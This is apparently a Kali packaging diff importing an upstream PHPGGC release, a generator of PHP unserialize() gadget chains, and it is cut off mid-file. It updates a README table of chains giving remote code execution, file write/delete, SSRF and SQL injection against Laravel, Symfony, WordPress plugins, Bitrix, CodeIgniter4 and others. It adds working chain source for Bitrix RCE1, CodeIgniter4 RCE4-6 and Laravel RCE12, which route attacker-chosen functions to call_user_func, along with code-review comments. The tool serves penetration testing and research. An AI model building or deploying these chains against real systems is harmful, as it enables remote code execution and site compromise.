Import upstream version 0.20221129
Kali Janitor
1 year, 5 months ago
19 | 19 | Gadget Chains |
20 | 20 | ------------- |
21 | 21 | |
22 | NAME VERSION TYPE VECTOR I | |
23 | CakePHP/RCE1 ? <= 3.9.6 RCE (Command) __destruct | |
24 | CakePHP/RCE2 ? <= 4.2.3 RCE (Function call) __destruct | |
25 | CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct | |
26 | CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct | |
27 | CodeIgniter4/RCE3 -4.1.3+ RCE (Function call) __destruct | |
28 | Doctrine/FW1 ? File write __toString * | |
29 | Doctrine/FW2 2.3.0 <= 2.4.0 v2.5.0 <= 2.8.5 File write __destruct * | |
30 | Dompdf/FD1 1.1.1 <= ? File delete __destruct * | |
31 | Dompdf/FD2 ? < 1.1.1 File delete __destruct * | |
32 | Drupal7/FD1 7.0 < ? File delete __destruct * | |
33 | Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct * | |
34 | Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct | |
35 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
36 | Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct * | |
37 | Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct * | |
38 | Kohana/FR1 3.* File read __toString * | |
39 | Laminas/FD1 <= 2.11.2 File delete __destruct | |
40 | Laminas/FW1 2.8.0 <= 3.0.x-dev File write __destruct * | |
41 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
42 | Laravel/RCE10 5.6.0 <= 9.1.8+ RCE (Function call) __toString | |
43 | Laravel/RCE2 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
44 | Laravel/RCE3 5.5.0 <= 5.8.35 RCE (Function call) __destruct * | |
45 | Laravel/RCE4 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
46 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
47 | Laravel/RCE6 5.5.* <= 5.8.35 RCE (PHP code) __destruct * | |
48 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
49 | Laravel/RCE8 7.0.0 <= 8.6.9+ RCE (Function call) __destruct * | |
50 | Laravel/RCE9 5.4.0 <= 9.1.8+ RCE (Function call) __destruct | |
51 | Magento/FW1 ? <= 1.9.4.0 File write __destruct * | |
52 | Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct | |
53 | Magento2/FD1 * File delete __destruct * | |
54 | Monolog/FW1 3.0.0 <= 3.1.0+ File write __destruct * | |
55 | Monolog/RCE1 1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+ RCE (Function call) __destruct | |
56 | Monolog/RCE2 1.4.1 <= 2.7.0+ RCE (Function call) __destruct | |
57 | Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct | |
58 | Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct * | |
59 | Monolog/RCE5 1.25 <= 2.7.0+ RCE (Function call) __destruct | |
60 | Monolog/RCE6 1.10.0 <= 2.7.0+ RCE (Function call) __destruct | |
61 | Monolog/RCE7 1.10.0 <= 2.7.0+ RCE (Function call) __destruct * | |
62 | Monolog/RCE8 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
63 | Monolog/RCE9 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
64 | Phalcon/RCE1 <= 1.2.2 RCE __wakeup * | |
65 | PHPCSFixer/FD1 <= 2.17.3 File delete __destruct | |
66 | PHPCSFixer/FD2 <= 2.17.3 File delete __destruct | |
67 | PHPExcel/FD1 1.8.2+ File delete __destruct | |
68 | PHPExcel/FD2 <= 1.8.1 File delete __destruct | |
69 | PHPExcel/FD3 1.8.2+ File delete __destruct | |
70 | PHPExcel/FD4 <= 1.8.1 File delete __destruct | |
71 | PHPSecLib/RCE1 2.0.0 <= 2.0.34 RCE (PHP code) __destruct * | |
72 | Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString | |
73 | Slim/RCE1 3.8.1 RCE (Function call) __toString | |
74 | Smarty/FD1 ? File delete __destruct | |
75 | Smarty/SSRF1 ? SSRF __destruct * | |
76 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct | |
77 | SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString | |
78 | SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString | |
79 | SwiftMailer/FW3 5.0.1 File write __toString | |
80 | SwiftMailer/FW4 4.0.0 <= ? File write __destruct | |
81 | Symfony/FW1 2.5.2 File write DebugImport * | |
82 | Symfony/FW2 3.4 File write __destruct | |
83 | Symfony/RCE1 3.3 RCE (Command) __destruct * | |
84 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * | |
85 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * | |
86 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * | |
87 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
88 | TCPDF/FD1 <= 6.3.5 File delete __destruct * | |
89 | ThinkPHP/FW1 5.0.4-5.0.24 File write __destruct * | |
90 | ThinkPHP/FW2 5.0.0-5.0.03 File write __destruct * | |
91 | ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct * | |
92 | ThinkPHP/RCE2 5.0.24 RCE (Function call) __destruct * | |
93 | Typo3/FD1 4.5.35 <= 10.4.1 File delete __destruct * | |
94 | WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct * | |
95 | WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct * | |
96 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString * | |
97 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct * | |
98 | WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
99 | WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
100 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct * | |
101 | WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct * | |
102 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct * | |
103 | WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString * | |
104 | WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString * | |
105 | WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
106 | WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
107 | WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
108 | WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
109 | Yii/RCE1 1.1.20 RCE (Function call) __wakeup * | |
110 | Yii2/RCE1 <2.0.38 RCE (Function call) __destruct * | |
111 | Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct * | |
112 | ZendFramework/FD1 ? <= 1.12.20 File delete __destruct | |
113 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * | |
114 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * | |
115 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct | |
116 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
22 | NAME VERSION TYPE VECTOR I | |
23 | Bitrix/RCE1 17.x.x <= 22.0.300 RCE (Function call) __destruct | |
24 | CakePHP/RCE1 ? <= 3.9.6 RCE (Command) __destruct | |
25 | CakePHP/RCE2 ? <= 4.2.3 RCE (Function call) __destruct | |
26 | CodeIgniter4/RCE1 4.0.2 <= 4.0.3 RCE (Function call) __destruct | |
27 | CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct | |
28 | CodeIgniter4/RCE3 -4.1.3+ RCE (Function call) __destruct | |
29 | CodeIgniter4/RCE4 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct | |
30 | Doctrine/FW1 ? File write __toString * | |
31 | Doctrine/FW2 2.3.0 <= 2.4.0 v2.5.0 <= 2.8.5 File write __destruct * | |
32 | Dompdf/FD1 1.1.1 <= ? File delete __destruct * | |
33 | Dompdf/FD2 ? < 1.1.1 File delete __destruct * | |
34 | Drupal7/FD1 7.0 < ? File delete __destruct * | |
35 | Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct * | |
36 | Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct | |
37 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
38 | Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct * | |
39 | Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct * | |
40 | Kohana/FR1 3.* File read __toString * | |
41 | Laminas/FD1 <= 2.11.2 File delete __destruct | |
42 | Laminas/FW1 2.8.0 <= 3.0.x-dev File write __destruct * | |
43 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
44 | Laravel/RCE2 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
45 | Laravel/RCE3 5.5.0 <= 5.8.35 RCE (Function call) __destruct * | |
46 | Laravel/RCE4 5.4.0 <= 8.6.9+ RCE (Function call) __destruct | |
47 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
48 | Laravel/RCE6 5.5.* <= 5.8.35 RCE (PHP code) __destruct * | |
49 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
50 | Laravel/RCE8 7.0.0 <= 8.6.9+ RCE (Function call) __destruct * | |
51 | Laravel/RCE9 5.4.0 <= 9.1.8+ RCE (Function call) __destruct | |
52 | Laravel/RCE10 5.6.0 <= 9.1.8+ RCE (Function call) __toString | |
53 | Laravel/RCE11 5.4.0 <= 9.1.8+ RCE (Function call) __destruct | |
54 | Laravel/RCE12 5.8.35, 7.0.0, 9.3.10 RCE (Function call) __destruct * | |
55 | Magento/FW1 ? <= 1.9.4.0 File write __destruct * | |
56 | Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct | |
57 | Magento2/FD1 * File delete __destruct * | |
58 | Monolog/FW1 3.0.0 <= 3.1.0+ File write __destruct * | |
59 | Monolog/RCE1 1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+ RCE (Function call) __destruct | |
60 | Monolog/RCE2 1.4.1 <= 2.7.0+ RCE (Function call) __destruct | |
61 | Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct | |
62 | Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct * | |
63 | Monolog/RCE5 1.25 <= 2.7.0+ RCE (Function call) __destruct | |
64 | Monolog/RCE6 1.10.0 <= 2.7.0+ RCE (Function call) __destruct | |
65 | Monolog/RCE7 1.10.0 <= 2.7.0+ RCE (Function call) __destruct * | |
66 | Monolog/RCE8 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
67 | Monolog/RCE9 3.0.0 <= 3.1.0+ RCE (Function call) __destruct * | |
68 | Phalcon/RCE1 <= 1.2.2 RCE __wakeup * | |
69 | PHPCSFixer/FD1 <= 2.17.3 File delete __destruct | |
70 | PHPCSFixer/FD2 <= 2.17.3 File delete __destruct | |
71 | PHPExcel/FD1 1.8.2+ File delete __destruct | |
72 | PHPExcel/FD2 <= 1.8.1 File delete __destruct | |
73 | PHPExcel/FD3 1.8.2+ File delete __destruct | |
74 | PHPExcel/FD4 <= 1.8.1 File delete __destruct | |
75 | PHPSecLib/RCE1 2.0.0 <= 2.0.34 RCE (PHP code) __destruct * | |
76 | Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString | |
77 | Slim/RCE1 3.8.1 RCE (Function call) __toString | |
78 | Smarty/FD1 ? File delete __destruct | |
79 | Smarty/SSRF1 ? SSRF __destruct * | |
80 | Spiral/RCE1 2.7.0 <= 2.8.13 RCE (Function call) __destruct | |
81 | Spiral/RCE2 -2.8+ RCE (Function call) __destruct * | |
82 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct | |
83 | SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString | |
84 | SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString | |
85 | SwiftMailer/FW3 5.0.1 File write __toString | |
86 | SwiftMailer/FW4 4.0.0 <= ? File write __destruct | |
87 | Symfony/FW1 2.5.2 File write DebugImport * | |
88 | Symfony/FW2 3.4 File write __destruct | |
89 | Symfony/RCE1 3.3 RCE (Command) __destruct * | |
90 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * | |
91 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * | |
92 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * | |
93 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
94 | Symfony/RCE6 v3.4.0-BETA4 <= v3.4.49 & v4.0.0-BETA4 <= v4.1.13 RCE (Command) __destruct * | |
95 | TCPDF/FD1 <= 6.3.5 File delete __destruct * | |
96 | ThinkPHP/FW1 5.0.4-5.0.24 File write __destruct * | |
97 | ThinkPHP/FW2 5.0.0-5.0.03 File write __destruct * | |
98 | ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct * | |
99 | ThinkPHP/RCE2 5.0.24 RCE (Function call) __destruct * | |
100 | Typo3/FD1 4.5.35 <= 10.4.1 File delete __destruct * | |
101 | WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct * | |
102 | WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct * | |
103 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString * | |
104 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct * | |
105 | WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
106 | WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
107 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct * | |
108 | WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct * | |
109 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct * | |
110 | WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString * | |
111 | WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString * | |
112 | WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
113 | WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
114 | WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
115 | WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
116 | Yii/RCE1 1.1.20 RCE (Function call) __wakeup * | |
117 | Yii2/RCE1 <2.0.38 RCE (Function call) __destruct * | |
118 | Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct * | |
119 | ZendFramework/FD1 ? <= 1.12.20 File delete __destruct | |
120 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * | |
121 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * | |
122 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct | |
123 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
124 | ZendFramework/RCE5 2.0.0rc2 <= 2.5.3 RCE (Function call) __destruct | |
117 | 125 | ``` |
118 | 126 | |
119 | 127 | Filter gadget chains: |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Bitrix; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '17.x.x <= 22.0.300'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'crlf'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Bitrix\Main\ORM\Data\Result( | |
16 | new \Bitrix\Main\Type\Dictionary( | |
17 | new \Bitrix\Main\Error( | |
18 | new \Bitrix\Main\UI\Viewer\ItemAttributes( | |
19 | new \Bitrix\Main\DB\ResultIterator( | |
20 | new \Bitrix\Main\DB\ArrayResult( | |
21 | $function, $parameter | |
22 | ) | |
23 | ) | |
24 | ) | |
25 | ) | |
26 | ) | |
27 | ); | |
28 | } | |
29 | } |
0 | <?php | |
1 | ||
2 | namespace Bitrix\Main { | |
3 | class Result | |
4 | { | |
5 | protected $errors; | |
6 | ||
7 | public function __construct(object $Dictionary) | |
8 | { | |
9 | $this->errors = $Dictionary; | |
10 | } | |
11 | } | |
12 | ||
13 | class Error { | |
14 | protected $message; | |
15 | ||
16 | public function __construct(object $ItemAttributes) | |
17 | { | |
18 | $this->message = $ItemAttributes; | |
19 | } | |
20 | } | |
21 | } | |
22 | ||
23 | namespace Bitrix\Main\ORM\Data { | |
24 | class Result extends \Bitrix\Main\Result | |
25 | { | |
26 | protected $isSuccess = false; | |
27 | protected $wereErrorsChecked = false; | |
28 | ||
29 | public function __construct(object $Dictionary) | |
30 | { | |
31 | parent::__construct($Dictionary); | |
32 | } | |
33 | } | |
34 | } | |
35 | ||
36 | namespace Bitrix\Main\Type { | |
37 | class Dictionary | |
38 | { | |
39 | protected $values; | |
40 | ||
41 | public function __construct(object $Error) | |
42 | { | |
43 | $this->values = [$Error]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Bitrix\Main\UI\Viewer { | |
49 | class ItemAttributes | |
50 | { | |
51 | protected $attributes; | |
52 | ||
53 | public function __construct(object $ResultIterator) | |
54 | { | |
55 | $this->attributes = $ResultIterator; | |
56 | } | |
57 | } | |
58 | } | |
59 | ||
60 | namespace Bitrix\Main\DB { | |
61 | class ResultIterator | |
62 | { | |
63 | private $counter = 0; | |
64 | private $currentData = 0; | |
65 | private $result; | |
66 | ||
67 | public function __construct(object $ArrayResult) | |
68 | { | |
69 | $this->result = $ArrayResult; | |
70 | } | |
71 | } | |
72 | ||
73 | class ArrayResult | |
74 | { | |
75 | protected $resource; | |
76 | protected $converters; | |
77 | ||
78 | public function __construct(string $function, string $parameter) | |
79 | { | |
80 | $this->converters = [$function, 'WriteFinalMessage']; | |
81 | $this->resource = [[$parameter], [['rce']]]; | |
82 | } | |
83 | } | |
84 | } |
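Review bot: The literals `'WriteFinalMessage'` and `[['rce']]` assigned in `Bitrix\Main\DB\ArrayResult::__construct` have no comment saying why those exact values are needed, so a reader cannot tell placeholders from values the target code depends on. A one-line comment above each assignment stating its role would make the file auditable and would help anyone describing what a serialized `Bitrix\Main\DB\ArrayResult` looks like in request data. Separately, `Bitrix\Main\ORM\Data\Result::__construct` only forwards to `parent::__construct($Dictionary)` and could be dropped. The capitalised parameter names (`$Dictionary`, `$Error`, `$ItemAttributes`) also differ from the camelCase used in the other gadget files of this commit.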
3 | 3 | |
4 | 4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall |
5 | 5 | { |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
6 | public static $version = '4.0.2 <= 4.0.3'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | 9 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'eboda'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); | |
16 | } | |
17 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace CodeIgniter\Cache\Handlers | |
3 | { | |
4 | class RedisHandler | |
5 | { | |
6 | protected $redis; | |
7 | ||
8 | public function __construct($func, $param) | |
9 | { | |
10 | $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( | |
11 | new \CodeIgniter\Model( | |
12 | new \CodeIgniter\Database\BaseBuilder, | |
13 | new \CodeIgniter\Validation\Validation, | |
14 | $func | |
15 | ), | |
16 | $param | |
17 | ); | |
18 | } | |
19 | } | |
20 | } | |
21 | ||
22 | namespace CodeIgniter\Session\Handlers | |
23 | { | |
24 | class MemcachedHandler | |
25 | { | |
26 | protected $memcached; | |
27 | protected $lockKey; | |
28 | ||
29 | public function __construct($memcached, $param) | |
30 | { | |
31 | $this->lockKey = $param; | |
32 | $this->memcached = $memcached; | |
33 | } | |
34 | } | |
35 | } | |
36 | ||
37 | namespace CodeIgniter | |
38 | { | |
39 | class Model | |
40 | { | |
41 | protected $builder; | |
42 | protected $primaryKey; | |
43 | protected $beforeDelete; | |
44 | protected $validationRules; | |
45 | protected $validation; | |
46 | ||
47 | public function __construct($builder, $validation, $func) | |
48 | { | |
49 | $this->builder = $builder; | |
50 | $this->primaryKey = null; | |
51 | ||
52 | $this->beforeDelete = array(); | |
53 | $this->beforeDelete[] = "validate"; | |
54 | ||
55 | $this->validation = $validation; | |
56 | $this->validationRules = array( | |
57 | "id" => array($func) | |
58 | ); | |
59 | } | |
60 | } | |
61 | } | |
62 | ||
63 | namespace CodeIgniter\Validation | |
64 | { | |
65 | class Validation | |
66 | { | |
67 | protected $ruleSetFiles; | |
68 | ||
69 | public function __construct() | |
70 | { | |
71 | $this->ruleSetFiles = array("finfo"); | |
72 | } | |
73 | } | |
74 | } | |
75 | ||
76 | namespace CodeIgniter\Database | |
77 | { | |
78 | class BaseBuilder | |
79 | { | |
80 | } | |
81 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '-4.1.3+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Predis\Connection\StreamConnection($function, $parameter); | |
16 | } | |
17 | } |
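Review bot: `CodeIgniter4/RCE5` (and `RCE6`, added in the next chain file) is missing from the README gadget-chain table that this same commit updates, which stops at `CodeIgniter4/RCE4`. Its `$version` string `'-4.1.3+'` is identical to the one the table gives for `RCE3`, and there is no `$information` to tell the two apart. Judging by the namespaces in the accompanying gadgets file (`Predis\...`, `Symfony\Component\...`), the chain appears to depend on packages outside CodeIgniter itself. Stating that in `$information` would let a reader tell whether a given installation is affected.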
0 | <?php | |
1 | ||
2 | namespace Predis\Connection | |
3 | { | |
4 | class StreamConnection | |
5 | { | |
6 | protected $parameters; | |
7 | ||
8 | function __construct($function, $paramter) | |
9 | { | |
10 | $this->parameters = new \CodeIgniter\Entity\Entity($function, $paramter); | |
11 | } | |
12 | } | |
13 | } | |
14 | ||
15 | namespace CodeIgniter\Entity | |
16 | { | |
17 | class Entity | |
18 | { | |
19 | protected $datamap; | |
20 | ||
21 | function __construct($function, $parameter) | |
22 | { | |
23 | $this->datamap = ["persistent" => new \Symfony\Component\HttpFoundation\Request($function, $parameter)]; | |
24 | } | |
25 | } | |
26 | } | |
27 | ||
28 | namespace Symfony\Component\HttpFoundation | |
29 | { | |
30 | class Request | |
31 | { | |
32 | public $server; | |
33 | public $cookies; | |
34 | ||
35 | function __construct($function, $paramter) | |
36 | { | |
37 | $this->cookies = ["key" => "value"]; | |
38 | $this->server = new \Symfony\Component\DependencyInjection\Argument\ServiceLocator($function, $paramter); | |
39 | } | |
40 | } | |
41 | } | |
42 | ||
43 | namespace Symfony\Component\DependencyInjection\Argument | |
44 | { | |
45 | class ServiceLocator | |
46 | { | |
47 | private $serviceMap; | |
48 | private $factory; | |
49 | ||
50 | function __construct($function, $paramter) | |
51 | { | |
52 | $this->factory = "call_user_func"; | |
53 | $this->serviceMap = ["REQUEST_METHOD" => [$function, $paramter]]; | |
54 | } | |
55 | } | |
56 | } |
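Review bot: The constructor parameter is misspelled `$paramter` in `StreamConnection`, `Request` and `ServiceLocator` in this file, while `Entity` spells it `$parameter`. The same misspelling recurs in the gadgets files for CodeIgniter4 RCE6 (`MultiBulk`) and Laravel RCE12 (every constructor that takes parameters). It is harmless at runtime but makes the files harder to search and review, so rename it to `$parameter` throughout. The constructors also omit a visibility keyword; `public function __construct($function, $parameter)` would match the Bitrix and CodeIgniter4 RCE4 gadget files in this commit.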
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '-4.1.3 <= 4.2.10+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Predis\Response\Iterator\MultiBulk($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | namespace Predis\Response\Iterator{ | |
2 | class MultiBulk{ | |
3 | protected $position; | |
4 | protected $size; | |
5 | private $connection; | |
6 | ||
7 | function __construct($function,$paramter) | |
8 | { | |
9 | $this->connection = new \Faker\ValidGenerator($function,$paramter); | |
10 | $this->position = 0; | |
11 | $this->size = 1; | |
12 | } | |
13 | } | |
14 | } | |
15 | ||
16 | namespace Faker{ | |
17 | class ValidGenerator{ | |
18 | protected $generator; | |
19 | protected $maxRetries; | |
20 | protected $validator; | |
21 | ||
22 | function __construct($function,$param) | |
23 | { | |
24 | $this->maxRetries = 1; | |
25 | $this->validator = $function; | |
26 | $this->generator = new \Faker\DefaultGenerator($param); | |
27 | } | |
28 | } | |
29 | ||
30 | class DefaultGenerator{ | |
31 | protected $default; | |
32 | ||
33 | function __construct($param) | |
34 | { | |
35 | $this->default = $param; | |
36 | } | |
37 | } | |
38 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Laravel; | |
3 | ||
4 | class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '5.8.35, 7.0.0, 9.3.10'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'According to different version you may need to modify the "gadgets.php". For Laravel5, use the field $rollbarNotifier. For laravel7 and later, use the filed $rollbarLogger'; | |
10 | ||
11 | ||
12 | public function generate(array $parameters) | |
13 | { | |
14 | $function = $parameters['function']; | |
15 | $param = $parameters['parameter']; | |
16 | ||
17 | $a = new \Monolog\Handler\RollbarHandler($function, $param); | |
18 | ||
19 | return $a; | |
20 | } | |
21 | } |
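Review bot: The `$information` text has a typo (`filed` for `field`) and inconsistent product naming (`Laravel5`, `laravel7`). It also asks the user to hand-edit `gadgets.php`, so the chain as shipped covers only the `$rollbarLogger` case even though `$version` lists 5.8.35 as well. Suggested wording: `'Depending on the version you may need to edit gadgets.php: for Laravel 5 use the field $rollbarNotifier, for Laravel 7 and later use the field $rollbarLogger'`. The temporary `$a` in `generate()` adds nothing; `return new \Monolog\Handler\RollbarHandler($function, $param);` is equivalent.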
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler{ | |
3 | class RollbarHandler{ | |
4 | private $hasRecords; | |
5 | //protected $rollbarNotifier; | |
6 | protected $rollbarLogger; | |
7 | ||
8 | function __construct($function,$paramter) | |
9 | { | |
10 | $this->hasRecords = true; | |
11 | //$this->rollbarNotifier = new \Illuminate\Foundation\Support\Providers\RouteServiceProvider($function,$paramter);//laravel5.8.35 | |
12 | $this->rollbarLogger = new \Illuminate\Foundation\Support\Providers\RouteServiceProvider($function,$paramter);//laravel7.0.0 | |
13 | } | |
14 | } | |
15 | } | |
16 | ||
17 | namespace Illuminate\Foundation\Support\Providers{ | |
18 | class RouteServiceProvider{ | |
19 | protected $app; | |
20 | ||
21 | function __construct($function,$paramter) | |
22 | { | |
23 | $this->app = new \Illuminate\View\Factory($function,$paramter); | |
24 | } | |
25 | } | |
26 | } | |
27 | ||
28 | namespace Illuminate\View{ | |
29 | class Factory{ | |
30 | protected $finder; | |
31 | ||
32 | function __construct($function,$paramter) | |
33 | { | |
34 | $this->finder = new \Symfony\Component\Console\Application($function,$paramter); | |
35 | } | |
36 | ||
37 | } | |
38 | } | |
39 | ||
40 | namespace Symfony\Component\Console{ | |
41 | class Application{ | |
42 | private $initialized; | |
43 | private $commands; | |
